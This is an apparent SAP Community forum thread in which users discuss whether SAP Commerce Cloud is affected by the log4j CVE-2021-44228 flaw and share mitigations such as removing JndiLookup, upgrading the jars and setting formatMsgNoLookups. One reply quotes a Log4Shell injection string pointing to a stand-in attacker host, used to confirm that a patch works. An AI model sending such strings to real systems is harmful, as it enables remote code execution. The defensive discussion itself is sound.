on 2021 Dec 11 8:22 PM
Hello,
We are using several versions of SAP Commerce Cloud. and we would like to know if we are vulnerable to the discovered vulnerability on log4j (CVE-2021-44228) ? if so, which versions ?
Kinds Regards,
Yassine
SAP has released multiple notes:
SAP has published a PDF available here (comment author added this on 2021-12-15)
Update (2021-12-20)
SAP has issued patched releases for supported versions (≥ 1905) of SAP Commerce Cloud. On at least SAP Note 3130939, SAP has indicated another resolution path which involves patching to the most recent patch version of SAP Commerce Cloud (for example, 1905.36, 2105.5)
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.
Hi Adam,
I can confirm that the workaround for Commerce Public Cloud provided by SAP is working.
I added the logic to one of the extension's buildcallbacks.xml, so the affected log4j class will be removed inside of the log4j-core.jar file during build (Replacing OOTB Files)
According to the build release log file, I see the output logging of successful patching:
In addition, the class "JndiLookup" is not available anymore on classpath (checking with HAC):
I also cannot reproduce the JNDI lookup vulnerability when sending/attacking with "${jndi:ldap://evilhost}" requests.
Version: Commerce Cloud System 1905.35
The link in the Description of the KBA is broken. Click on the Attachments tab and download the XML from there pranavbhartia1
Hi, everyone,
I would like to briefly share my experiences.
I am also very sure that SAP Commerce (on Premise) is affected by this problem.
We currently manage 2 shop instances in our project. On Saturday our customer asked us to do a hotfix deployment and replace the libraries with v2.15.
We used a macro in the buildcallbacks.xml, which deletes the obsolete libraries. Via ant customize we then copy the new versions to "/platform/ext/core/libs".
Alternatively, you can manually unzip the Commerce Installation Package, exchange the libraries and zip again.
I hope I could help a bit. Hopefully, SAP will provide official patches soon.
Many greetings
Torsten
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.
Hi Torsten,
We tried to upgrade with a new version in /platform/ext/core/libs but after replacing the below jars with the 2.15 version, we don't see any logs getting created other than error logs. Since the platform uses log4j-1.2.17 jar and 2.9.1 version, upgrading the api, core, and sl4j only to 2.15 is not working and the log4j-1.2.17 updated version is no longer available. Let me know if you are able to resolve it and the steps you followed for the same.
log4j-api-2.9.0.jar
log4j-core-2.9.0.jar
log4j-slf4j-impl-2.9.0..jar
Best,
Pankaj
Hi pachoudhary,
we only replaced the jars with v2.X.
We also needed to adapt the log4j properties. In our "local.properties" there was for "tomcat.generaloptions" an entry like "-Dlog4j.configuration=log4j_init_tomcat.properties". This configuration file did not exists. We needed to remove it, then logging was working well. I don't know where this configuration entry comes from, but log4j < v2.15 did not have any problems with it.
Our real configuration file ist given by the property "log4j2.config.xml=..." in "local.properties".
Maybe this can help you.
Best regard.
Hi torsten-mittag
We did follow the above steps. however, we got an error.
We are on on-prem hybris 6.3 and we are using Java 8.
We believe this is due to some compatibility issues with Java 9/tomcat versions.
Can you let us know, what Java/tomcat versions you are using in the SAP commerce suite, when you did the steps mentioned above.
I appreciate your help.
Regards,
Bharadwaj
Hi bsridh,
we are using SAP Commerce 2005 (on Prem), Tomcat 8.5 and the SAP JDK:
openjdk 11.0.13 2021-10-18 LTS
OpenJDK Runtime Environment SapMachine (build 11.0.13+8-LTS-sapmachine)
OpenJDK 64-Bit Server VM SapMachine (build 11.0.13+8-LTS-sapmachine, mixed mode)
Unfortunally, I have no experience with lower versions. In some other projects of my company SAP Commerce 1808 and above is used and they updated Log4j in the same way. Best regards,
Torsten
torsten-mittag - Thank you very much !! .. I really appreciate your quick response and your answer is very helpful.
bsridh - Please refer the SAP's document on their Support Trust Center Portal https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025...
They have release an official KBA artical for On-Prem here https://launchpad.support.sap.com/#/notes/3130967
You can take a look and follow the steps as recommended by SAP.
Hi Yassine,
I am fairly sure that commerce is affected by this too. As only SAP can update external dependencies in the platform we have to use the other mitigation measure:
Disable the JNDI lookup by setting the following property in the property file:
log4j2.formatMsgNoLookups=true
This can also be done without a deployment as described here:
My tests so far were performed on a local environment (commerce version 2011.13 / log4j-core-2.13.3) only. They also didn't cover anything beyond the platform. Meaning I don't know what needs to be done regarding SOLR which seems to be affected by the vulnerability too.
Good luck everyone!
Felix
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.
It is for SAP Cloud, if it is also applicable for on-premise, I don't know.
Sorry,
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.
User | Count |
---|---|
32 | |
2 | |
1 | |
1 | |
1 | |
1 | |
1 | |
1 | |
1 |
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.